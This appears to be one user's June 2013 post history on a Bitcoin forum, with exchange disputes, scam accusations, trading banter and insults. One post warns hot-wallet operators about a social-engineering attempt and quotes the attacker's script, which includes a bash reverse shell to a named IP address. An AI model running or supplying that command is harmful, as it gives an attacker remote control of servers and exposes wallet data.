Course it might be a good idea to let people know in advance.
1722  Bitcoin / Bitcoin Discussion / Re: Measure Value in Infrastructure Development not Price on: June 09, 2013, 07:55:32 PM
In the speculation threads people are crying over the drop in price as though 'this is the end'. I'd like to point out that MP said 100 to 130 back early April and it's been 100 to 130 ever since.

This would be exactly correct.

Measure the value of a Bitcoin by the infrastructure and people behind it- and it's only going up. How many conferences/meetups are there this year? 10+? It's incredible. I couldn't be more excited.

If you think infrastructure = conferences...heh.
1723  Economy / Trading Discussion / Social Engineering attack, probably Bitcoin-driven. on: June 09, 2013, 07:29:22 PM
Mr P. was hit earlier today, to no actual effect.

While the attackers targetted his blog, the MO may have larger implications for the Bitcoin community, because the attacker was trying to get this script run on the server. The relevant part there is:

Quote
tar -cvzPf /root/$DIR/$DATE/$DATE-$SERVER-etc.tar.gz /dev/shm
echo "Uploading backed up data."
bash -i >& /dev/tcp/96.43.130.122/80 0>&1

which could perhaps compromise an electrum wallet? (or more generally any hotwallet if /shm is sloppily being used).

This would be a good time for everyone running a hotwallet on a hosted/managed server to review their use of /shm, because you never know when an overworked entry level support person will just run a "back-up script" on your account.
1724  Economy / Scam Accusations / Re: [scam tag request] user unclescrooge founder and operator of bitfinex.com on: June 09, 2013, 06:20:10 PM
I propose to the moderators to close this thread because no one was actually scammed. This is a dispute between partners and has nothing to do with the general public. No one on Bitfinex has actually lost any money, so by definition this isn't a scam.

As long as withdrawals on Bitfinex continue to function perfectly there is no scam.

On the contrary: scammers outing each other makes for a great service to the community.
1725  Economy / Service Announcements / Re: [ANN] BTC.sx - Leveraged trading made easy on: June 09, 2013, 06:19:09 PM
Update:

Options to trade bitcoin, in the $1bn market are opening up fast. Here's an independent comparison of what's on offer: Bitcoin Derivatives, Liquidity and Counterparty Risk

Good job to all of our traders as over 70% of open positions are currently posting profits.

One of our traders opened the following position two days ago:

0.0002 btc/pt short @ $116.92
Deposit size 0.25 btc
Daily funding cost 0.018 btc

Currently sitting on an unrealized PnL of 0.55 btc

At over 200% profit... you're on par to have placed one of our most profitable positions to date. You know who you are.

Todays sentiment amongst our traders is heavily biased towards the short side.

Trade safe.

That piece on psychologicalscammer.com is uniquely ignorant. Bitcoin derivatives is MPEx, no more, no less. 482,472 BTC traded in March. No idea where you've found five lolsites to write 5000 words about, but this is not how it's done.

Actually, if you people would be less cheeky and less stupid you wouldn't find yourselves spending your time pumping .5 BTC "profits" and ridiculous "70% success rates" while dreaming of the 1bn market other people actually have.
1726  Economy / Scam Accusations / Bitfinex is a scam. on: June 09, 2013, 06:16:08 PM
I. Self-moderated "support thread", filled with a bunch of socks posting nonsense. This is standard scammer operating procedure.

II. Running stolen, bug ridden software (the old Bitcoinica codebase) that has already proven itself useless in the marketplace (three times!)

III. Scammers themselves admit to crediting "investors" infinite USD/BTC to execute the naive users.

It's true that scammer tags aren't really given out much anymore, but that's no reason to allow well known scammers run amok. You have been warned.
1727  Economy / Securities / Re: OTC options trading for BTC/USD on: June 09, 2013, 06:13:05 PM

Ideal trust no one. But Theymos has been involved in more than one scam and has abused his power. No one will but n00bs will trust this/him.

And I remember you were one of pirate's biggest proponents.

But but but! He's taken like a few months off and everything! How could you not have forgotten that?

Well, at least you've forgotten all about his imaginary mining op in which he sold shares but never managed to post a pic thereof or anything. You have forgotten, right?
1728  Other / Off-topic / Re: [NSFW] Dirty Heidy on: June 08, 2013, 05:57:49 PM
These pictures all not all the same person. I call scam.  Shocked

They are all from me! Some are older than others, that's why the playboy tatoo is not on my breasts... I have 5 years of photos to share, be patient for the remaining ones!

And yeah, I know, took 2-3 kg and gravity is pushing on my tits, but it is ME!

This is actually somewhat convincing. A scammer would take significantly longer to identify what my objection was based on.

Actually, gravity is pulling on tits, not pushing on them.
1729  Bitcoin / Legal / Re: Is it legal to offer bitcoin to moneypak exchange service? on: June 08, 2013, 05:55:49 PM
Well this escalated quickly....

Is it smart to be asking for legal advice on the Internet? Leaving aside the exact corner you've picked.

If it wasn't, why would the "Legal" section even exist?  O, I see wat u did their.

-W.E. Coyote, Esq.

Plz not to troll the OP. A lot of sources are better than one source and no amount of schooling can make you a legalist or w/e it's called. A bunch of people gathering around a keg and chanting is the way to go.

Tbh I kinda enjoy the new America.

1730  Economy / Scam Accusations / Re: [scam tag request] user unclescrooge founder and operator of bitfinex.com on: June 08, 2013, 09:51:13 AM
That being said, we are getting a bit off track.  Usually, companies, before they fire workers, if the workers are of significant value, have a severance agreement with their employees.  Do you think some sort of severance pay would be to your satisfaction?

And if not, what do you think a satisfactory result should be?

Once again, in case anyone is unclear on the matter, I am completely neutral in this case.  I actually have no idea who BFX is or what they do, and have met none of the parties here, but I am just trying to help make the community a bit better by facilitating a dialogue and "arbitrating" if you will.

So basically you're just an uppity clueless noob. The veheheeeery uppity but extreeeheheeemely clueless and therefore extremely lulzy variety.
1731  Economy / Scam Accusations / Re: [scam tag request] user unclescrooge founder and operator of bitfinex.com on: June 07, 2013, 10:48:46 PM
But they essentially gave you the option of converting your profit sharing shares to equity shares (had you chose to do so, since they were equity shares, you would have been responsible for a part of the losses).

From what retarded planet do you bring these tidings of shareholders "responsible for part of the losses"?

That's why you were fired.

From what alternate universe do you bring these tidings of "firing" shareholders?

This is the funniest thread of the week for seriously.
1732  Economy / Securities / Re: S.MG - The Ministry of Games. on: June 07, 2013, 10:41:56 PM
So did the IPO sell out already?

Has anybody started a pass-through for this yet?

It's not sold out yet. People have been putting bids in since the asset became available, there was one share sale Tues (something like 15%), and another today (about 70%). The last one will be Monday the 10th.
1733  Economy / Lending / Re: Pawn your forum accounts! BTC Loans using your forum account as collateral! on: June 07, 2013, 09:09:37 PM
This thread is retarded  Tongue

You think?!

(Personally, I'm holding out for the hats.)
1734  Economy / Scam Accusations / Re: [scam tag request] user unclescrooge founder and operator of bitfinex.com on: June 07, 2013, 08:55:44 PM
MPOE-PR's posts are a mixture of outrageous trolling and insight.

True.

This is trolling.

False.

That's how politics works, especially where low information voters are concerned. Well done, a loser is you.

I'm guessing that the trolling is based on fundamental opposition to being able to buy or sell on the margin and a preference for an options system.

MPEx has margin. What now?

MPOE's options system is directly in competition with BFX.

Bitfinex is a bucket shop. As such it may be construed to be in competition with bad radio programs (the sort that promote the various conspiracy theories) and perhaps Max Keiser. Even such a claim would be a significant (and unwarranted) leap.

Now it is fine if you want that - however there are risks with people not being able to cover their options as well.

Not on MPEx. Read up on things before you discuss said things.

So slandering the competition makes sense.

Calling out the various scams and idiocies (the two are often hard to distinguish) has been misrepresented as slander by scammers and idiots since about forever. It never worked, it's never going to work, it's just a waste of breath.
1735  Economy / Service Discussion / Re: Introducing the MPEx Rota on: June 07, 2013, 08:51:52 PM
Overall the idea that someone controls all the addresses they send BTC to is about as strong as the idea that someone is in cahoots with anyone they ever interact with.
1736  Economy / Securities / Re: [LTC-GLOBAL] - ART - building a open art studio [week 23] on: June 07, 2013, 05:08:11 PM
crickets...

PS! Dude, you are way outside of your competence level.  I'll preserve that fine example of your utter stupidity for the future generation.

Cheers!

Did you realize in this topic there is not one single forum user praising or congratulating your management? You sound like a delusional person screaming that no one is listening to me without also noticing that no one is  listening to you... ("Crickets"?) The only thing you are preserving is evidence which speaks about the capacity you lack to deal with people's investments. If there is something the future generations will learn from my fine example is to not let people like you play with their wealth.

I have been enjoying the thread from a comedic perspective tbh. Take for instance the expense account which does not figure any amortization charges. Pure gold.
1737  Economy / Service Announcements / Re: [ANN] Tangible Cryptography suspends Bitcoin related transactions on: June 07, 2013, 05:06:33 PM
It is something we are considering.  Understand though that would essentially be us conceding the issue to the state of VA and we would then need to enforce mechanisms to block VA residents from using our service.  It is utterly baffling that MSB/MT regulations at state levels haven't be challenged on interstate commerce grounds but we haven't found any case law to suggest they have.  Of course it likely is only time before some other states move to "protect" their residents as well.

Easy enough to explain it: the slightly different, slightly quirky 50 state regulations act collectively as a barrier to entry in that market, requiring one to sink about a couple million dollars into nonsense papershuffling. The fiat world equivalent of MPEx's 30 BTC regfee, if you will; you don't have that capital to throw away, you're not old enough to play.

The parties with enough bankroll to challenge successfully are better served by taking advantage of the barrier than bringing it down. The parties without enough bankroll are welcome to go suck on a lemon.

(And before anyone gets all agitated about current politics: this is how the US has worked ever since original incorporation, a coupla hundred years ago.)
1738  Bitcoin / Legal / Re: Is it legal to offer bitcoin to moneypak exchange service? on: June 07, 2013, 05:04:15 PM
I've heard mixed opinions in this area. Any educated opinions on the subject would be appreciated.

If it isn't legal, how are other sites operating without problem?

Is it smart to be asking for legal advice on the Internet? Leaving aside the exact corner you've picked.
1739  Economy / Service Discussion / Re: Bitcoin White Paper-Help Requested on: June 07, 2013, 05:03:23 PM
Hi All!

I'm relatively new to bitcoin but am totally fascinated with all things BTC. I work in the finance industry and as part of my job I assist with the creation of white papers on a variety of topics. Just today I had the idea of writing a white paper on bitcoin, giving a broad overview of what it is, how it has the potential to revolutionize the marketplace, and what hurdles it needs to overcome. I've searched around the internet and haven't been able to find something that is both broadly encompassing, sophisticated and sufficiently detailed while still being relatively easy to comprehend by people who aren't technically inclined.

I'm planning on getting started this weekend and will be doing a lot of research to make sure that my paper is both accurate and as complete as possible. What I am hoping for are members of this community who would be willing to help me by answering questions, especially about the more technical details. I'm fairly competent in that regard but will be the first to admit that my CS knowledge is pretty limited compared to a great number of members on these boards.

As far as pay goes I'm willing to tip you for your time if you require. Since I wont be making any money off this and will be using it purely to spread to word of bitcoin I am hoping to get one or two volunteers to help me out for free! Its really about getting sophisticated investors and members of the financial community who don't know much about bitcoin to learn about it in an easy to digest format, all with the goal of advancing bitcoin.

I promise that I will be doing the majority of the heavy lifting in terms of research and writing by myself (unless someone wants to volunteer to co-author the paper with me) and will only be utilizing your efforts for questions that I cant find enough information on or really just cant understand even after sufficient research.

Anyway, feel free to post here or PM me if you're willing to help. Looking forward to hearing from you!

Here's everything you could possibly need.
1740  Economy / Service Discussion / Re: The largest Bitcoin futures exchange (Send shares ) on: June 07, 2013, 04:26:42 PM
The largest Bitcoin futures exchange
Two-way trading with 50% deposit for long and 25% for short.
The only exchange that gives out free stocks
One million free shares of limited dividend stocks to the users who contribute to our exchange.

https://796.com/reg/index/100166?lang=en

Yeah, something that got started yesterday is "the largest".

How about you read up on how this sort of retarded bullshit worked out for other retarded bullshitters just like yourself?

Also, this claim is false:

The only exchange that gives out free stocks

MPEx does that occasionally, such as for instance back in March:
